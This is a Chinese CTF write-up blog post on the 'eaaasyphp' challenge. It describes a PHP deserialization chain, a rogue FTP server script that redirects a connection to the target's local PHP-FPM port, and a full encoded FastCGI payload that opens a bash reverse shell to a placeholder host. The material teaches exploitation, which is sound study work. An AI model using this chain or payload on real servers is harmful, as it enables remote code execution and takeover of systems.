陇原杯 eaaasyphp

最新推荐文章于 2024-05-30 12:54:24 发布
最新推荐文章于 2024-05-30 12:54:24 发布
阅读量3.7k 收藏
点赞数 2
分类专栏: ctf 文章标签: php 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45751765/article/details/121414538
版权

1NDEX

0x00 前言

比赛的时候一会写出个pop链,一发就500直接崩溃
后面才知道没有写权限也会这样(一开始以为自己🐖👃链子写错了—)
看了师傅们的wp才知道还是自己太菜🌶
知识点:FTP SSRF 打穿内网
注:php7.2.20已修复__wakeup逃逸
一开始想用hint看phpinfo来着 __wakup行不通
bypass比较方便
在这里插入图片描述
先看个phpinfo
在这里插入图片描述
API属于是惹眼了

0x01 复现

贴上源码和师傅的精简pop
学习一下别人的链子为什么写的比你好?!

<?php
class Check {
    public static $str1 = false;
    public static $str2 = false;
}
class Esle {
    public function __wakeup()
    {
	    Check::$str1 = true;
    }
}
class Bypass {

    public function __destruct()
    {
        if (Check::$str1) {
            ($this->str4)();
        } 
        
    }
}
class Welcome {
    public function __invoke()
    {
        Check::$str2=true;
	return "Welcome" . $this->username;
    }
}
class Bunny {
    public function __toString()
    {
        if (Check::$str2) {
            if(!$this->data){
                $this->data = $_REQUEST['data'];
            }
            file_put_contents($this->filename, $this->data);
        } else {
            throw new Error("Error");
        }
    }
}
class Hint {

    public function __wakeup(){
        $this->hint = "no hint";
    }

    public function __destruct(){
        if(!$this->hint){
            $this->hint = "phpinfo";
            ($this->hint)();
        }
    }
}
$a=new Esle();
$b=new Bypass();
$b->str4=new Welcome;
$b->str4->username=new Bunny();
$b->str4->username->filename="daidai.php";
$c=serialize([$a,$b]);
echo $c;
?>

data传shell
看到dl这边也卡住了 我不是一个人

开始扫盲

师傅文章

https://whoamianony.top/2021/10/24/Web%E5%AE%89%E5%85%A8/%E6%95%99%E4%BD%A0%E7%94%A8%20FTP%20SSRF%20%E6%89%93%E7%A9%BF%E5%86%85%E7%BD%91/

这篇更详细一点

https://whoamianony.top/2021/05/15/Web%E5%AE%89%E5%85%A8/%E6%B5%85%E5%85%A5%E6%B7%B1%E5%87%BA%20Fastcgi%20%E5%8D%8F%E8%AE%AE%E5%88%86%E6%9E%90%E4%B8%8E%20PHP-FPM%20%E6%94%BB%E5%87%BB%E6%96%B9%E6%B3%95/

拾人牙慧了属于是 (字比较丑
在这里插入图片描述
tips:被动模式下,FTP Server能指定客户端连接的地址和端口
将127.0.0.1:9000作为目标实现ssrf打击php-fpm
适用于没有写权限的环境

公网VPS起个恶意ftp

FTP 和 HTTP 类似,协议内容全是纯文本
ftp状态码
https://www.cnblogs.com/dongiosblogs/p/4548770.html

# evil_ftp.py
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 
s.bind(('0.0.0.0', 23))
s.listen(1)
conn, addr = s.accept()
conn.send(b'220 welcome\n')  #220 服务就绪,可以执行新用户的请求。
#Service ready for new user.
#Client send anonymous username
#USER anonymous
conn.send(b'331 Please specify the password.\n') # 331 用户名正确,需要密码
#User name okay, need password.
#Client send anonymous password.
#PASS anonymous
conn.send(b'230 Login successful.\n')
#User logged in, proceed. Logged out if appropriate.
#TYPE I
conn.send(b'200 Switching to Binary mode.\n') #命令确定
#Size /
conn.send(b'550 Could not get the file size.\n')  # 550 未执行请求的操作。文件不可用(例如,未找到文件,没有访问权限)
#EPSV (1)
conn.send(b'150 ok\n') #150 文件状态正常,准备打开数据连接。
#PASV
conn.send(b'227 Entering Extended Passive Mode (127,0,0,1,0,9000)\n') #STOR / (2) 227 进入被动模式 (h1,h2,h3,h4,p1,p2)。
conn.send(b'150 Permission denied.\n')
#QUIT
conn.send(b'221 Goodbye.\n')
conn.close()

payload使用gopherus生成
这里用脚本了,没办法,我是彩笔(之后补上)
file_put_contents($this->filename, $this->data);
filename=ftp://aaa@x.x.x.x(VPS):23/123
data= gopherus->生成的payload
取 _ 后面的部分
在这里插入图片描述

brain.md

file_put_contents(ftp://aaa@x.x.x.x(VPS):23/123,gopherus->生成的payload)
注意灵活使用协议
这样靶机先连到恶意FTP服务器
后来FTP服务器告诉靶机去连接(127.0.0.1:9000),然后gopherus生成的恶意payload当作data发送至靶机的127.0.0.1:9000,也就是向靶机的php-fpm发送恶意数据包–>执行代码–>ssrf
FTP服务器起到重定向payload的作用
vps起恶意FTP 开监听 上poc
在这里插入图片描述
在这里插入图片描述
Done!
payload

?code=a:2:{i:0;O:4:"Esle":0:{}i:1;O:6:"Bypass":1:{s:4:"str4";O:7:"Welcome":1:{s:8:"username";O:5:"Bunny":1:{s:8:"filename";s:27:"ftp://aaa@xxx:23/123";}}}}&data=%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%05%05%00%0F%10SERVER_SOFTWAREgo%20/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP/1.1%0E%03CONTENT_LENGTH102%0E%04REQUEST_METHODPOST%09KPHP_VALUEallow_url_include%20%3D%20On%0Adisable_functions%20%3D%20%0Aauto_prepend_file%20%3D%20php%3A//input%0F%17SCRIPT_FILENAME/var/www/html/index.php%0D%01DOCUMENT_ROOT/%00%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%00f%04%00%3C%3Fphp%20system%28%27bash%20-c%20%22bash%20-i%20%3E%26%20/dev/tcp/xxx/7777%200%3E%261%22%27%29%3Bdie%28%27-----Made-by-SpyD3r-----%0A%27%29%3B%3F%3E%00%00%00%00%0A%27%29%3B%3F%3E%00%00%00%00

关于php-fpm

在这里插入图片描述

几篇好的基础文章

https://www.cnblogs.com/followyou/p/9460058.html
https://blog.csdn.net/weixin_39664643/article/details/114977217

补一篇gopher

师傅讲的很好

https://zhuanlan.zhihu.com/p/112055947

参考文章

https://blog.csdn.net/weixin_44502336/article/details/121210310

0x02 rethink

属于是🕊怪了
之前一直在打美亚,ctf停滞了
看到同龄师傅们都tql,留下了羡慕的泪水
以后每场都要好好复现

k_du1t
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 6
    评论
专栏目录
第二届剑杯sevrer save取证题
09-07
pass:c77ad47ba4c85fae66f08ec12e0085dd sevrer save_1 题目内容:黑客是使用什么漏洞来拿下 root 权限的。格式为:CVE-2020-114514 sevrer save_2 题目内容:黑客反弹 shell 的 ip 和端口是什么,格式为:10.0.0.1:4444 sevrer save_3 题目内容:黑客的病毒名称是什么?格式为:filename sevrer save_4 题目内容:黑客的病毒运行后创建了什么用户?请将回答用户名与密码:username:password sevrer save_5 题目内容:服务器在被入侵时外网 ip 是多少? 格式为:10.10.0.1 sevrer save_6 题目内容:病毒运行后释放了什么文件?格式:文件 1,文件 2 sevrer save_7 题目内容:矿池地址是什么?格式:domain:1234 sevrer save_8 题目内容:黑客的钱包地址是多少?格式:xx:xxxxxxxx
剑杯2023-Incidentresponse3-取证题
09-08
IR总共三个文件,这是其中一个,需要下载三个文件才能解压 题目内容:你是公司的一名安全运营工程师,今日接到外部监管部门通报,你公司网络出口存在请求挖矿域名的行为。需要立即整改。经过与网络组配合,你们定位到了请求挖矿域名的内网 IP 是 10.221.36.21。查询 CMDB 后得知该 IP 运行了公司的工时系统。(虚拟机账号密码为:root/IncidentRe IncidentResponse_1 题目内容:挖矿程序所在路径是? IncidentResponse_2 题目内容:挖矿程序连接的矿池域名是? IncidentResponse_3 题目内容:攻击者入侵服务器的利用的方法是? IncidentResponse_4 题目内容:攻击者的 IP 是? IncidentResponse_5 题目内容:攻击者发起攻击时使用的 User-Agent 是? IncidentResponse_6 题目内容:攻击者使用了两种权限维持手段,相应的配置文件路径是? IncidentResponse_7 题目内容:攻击者使用了两种权限维持手段,相应的配置文件路径是?(md5 加密后以 b 开头)
2021剑杯线下赛题目
04-10
守护数字安全,构建清朗空间!首届“剑杯”网络安全大赛,全国首次“以防为主”的网络安全大赛。
第二届剑杯初赛题目汇总.zip
09-07
剑杯bf-ezweb-hacked-hardweb-smallsword-wireshark1-tcpdump
2021年深育杯Web
feng的博客
11-14 2120
WebLog 访问发现是个文件下载,下载的是日志文件,目录穿越不太好传,尝试拿bp爆破一下日期来下载Log,发现了一个jar: 访问?logname=cb-0.0.1-SNAPSHOT.jar把jar包下载下来,发现存在一个反序列化的后门: @ResponseBody @RequestMapping({"/bZdWASYu4nN3obRiLpqKCeS8erTZrdxx/parseUser"}) public String getUser(String user) throws E
2021 原战“疫”杯 eaaasyphp wp
Sapphire037的博客
11-08 361
eaaasyphp <?php class Check { public static $str1 = false; public static $str2 = false; } class Esle { public function __wakeup() { Check::$str1 = true; } } class Hint { public function __wakeup(){ $this-&gt
[原战疫2021网络安全大赛]eaaasyphp
cosmoslin的博客
11-11 3115
eaaasyphp <?php class Check { public static $str1 = false; public static $str2 = false; } class Esle { public function __wakeup() { Check::$str1 = true; } } class Hint { public function __wakeup(){ $this-&gt
记一次流量分析实战——2021剑杯(webshell)
热门推荐
Battery的博客
08-15 8万+
1.分析数据包hack.pcap,黑客登录系统使用的密码是________。2.分析数据包hack.pcap,黑客修改了一个文件日志,文件的绝对路径为________。3.分析数据包hack.pcap,黑客获取webshell之后,权限是_________?4.分析数据包hack.pcap,黑客写入的webshell文件名是_________。5.分析数据包hack.pcap,黑客上传的代理工具客户端名字是__________。......
ZJCTF NiZhuanSiWei(基础复习篇)--php流与LFI
weixin_45751765的博客
08-18 205
0x00前言 a.关于php流封装 每个流都有一个协议和一个目标。指定协议和目标的方法是使用流标识符。其格式如下 <scheme>://<target> <scheme>是流的封装协议,<target>是流的数据源
[ctfshow web入门]常用姿势807-812
weixin_45751765的博客
04-15 2694
808 811 812
【Dest0g3 520迎新赛】web部分writeup
weixin_45751765的博客
05-29 2023
Phpdest 访问日志可包含 直接getshell Easyphp 触发error直接得flag Simplerce 进制编码绕过 str_ireplace Easyssti Fuzz一下几个主要的blacklist 参考 https://xz.aliyun.com/t/9584#toc-32 0c过一下空格 Pharpop __destruct变量销毁会等程序运行完 但是有throw new error 利用php gc强制回收 浅析GC回收机制与phar反序列化 | Arsene.Tang
Steamdeck使用Windows系统游玩雪地奔驰时闪退问题解决方法
fxalll的博客
05-28 373
在github正好有一个叫dxvk的库,能够基于vulkan实现d3d11,因此我们访问https://github.com/doitsujin/dxvk,从 Releases下载dxvk-2.3.1.tar.gz(当前最新版本),解压压缩包,在x64 目录中获取 dxgi.dll 和 d3d11.dll,并将两个dll文件放进Snowrunner.exe根目录所在的位置,再次启动游戏,游戏果然正常运行了。因此我自己分析终于解决该问题。困扰我两天的问题终于解决了,也算这个小众游戏全网的第一个解决方案吧。
linux 阿里云服务器安装ImageMagick和php扩展imagick
qq_54039576的博客
05-27 324
我的服务器默认是php.7.4.3 , 改完php -m 是找不到imagick的,实际上没对应php版本解锁,Alibaba Cloud Linux 3.2104 LTS 64位。就所有php.ini全改一遍, 再重启一遍apache和数据库。#寻找所有php.ini文件。
PbootCMS后台用户账号密码时进行重置工具
itfans123的博客
05-29 156
2)在浏览器直接访问访问该文件地址,然后按照页面提示输入相关信息进行重置,此处填写的“数据库配置文件”用于重置工具连接数据,如果没有做过特殊改动,一般默认即可,然后输入要重置的账号和新密码,重置后一定要记得删除该工具,切记!1)下载重置工具解压包,解压后将resetpw.php文件直接上传到网站根目录下;使用完之后一定要删除resetpw.php文件!工具用于忘记PbootCMS后台用户账号密码时进行重置。
HackTheBox-Machines--Popcorn
七天
05-28 473
Popcorn 测试过程。
建WordPress主题官网模板
最新发布
xiaoyuya
05-30 170
WordPress主题官网模板
3.location的写法
u010198709的博客
05-28 322
让服务器接收到请求后,根据需求改写地址,以改写的地址给客户端响应。优先级: =, ^~, ~, ~*, location /nginx通过fastCGI机制调用PHP,处理动态资源。php以fpm的方式运行,有自己独立的进程、服务。将httpd换为nginx,高并发、高性能。作用: 匹配客户端响应。
PHP深入理解-PHP架构布局
weixin_44703272的博客
05-27 253
执行流程:解析为Token:将PHP代码解析成标记(tokens)。TSRM:线程资源管理相关的目录,一般只有和Apache结合使用时会涉及到线程资源管理相关的代码。ext:主要是扩展相关的目录,通过ext_skel命令生成自定义模块,会默认安装到这个目录。目录结构:sapi:存放根据不同环境支持的上层API交互形式,实现了不同的输入输出形式。架构结构:Zend层:为上层的PHP提供基础的内存管理和数据结构。SAPI层:与服务器进行通信,封装了不同的通信类型,如CGI、FastCGI和CLI。
剑杯writeup
07-28
根据提供的引用内容,我了解到以下信息: - 引用\[1\]提到了关于虚拟机内存文件(vmem)和解析工具vol3的内容。 - 引用\[2\]提到了嫌疑人下载过无影无踪扫描文件,并导出了ntfs元文件和使用了内存镜像进行分析的命令。 - 引用\[3\]提到了一次内存分析的情况,并给出了内存主机的产品密钥。 然而,你的问题是关于"剑杯writeup",但是在提供的引用内容中并没有提到这个问题的相关信息。请提供更多的上下文或明确你的问题,以便我能够为你提供更准确的答案。 #### 引用[.reference_title] - *1* *2* *3* [[2021首届“剑杯”网络安全大赛 决赛]内存取证writeup](https://blog.csdn.net/weixin_46081055/article/details/120527685)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^insert_down1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值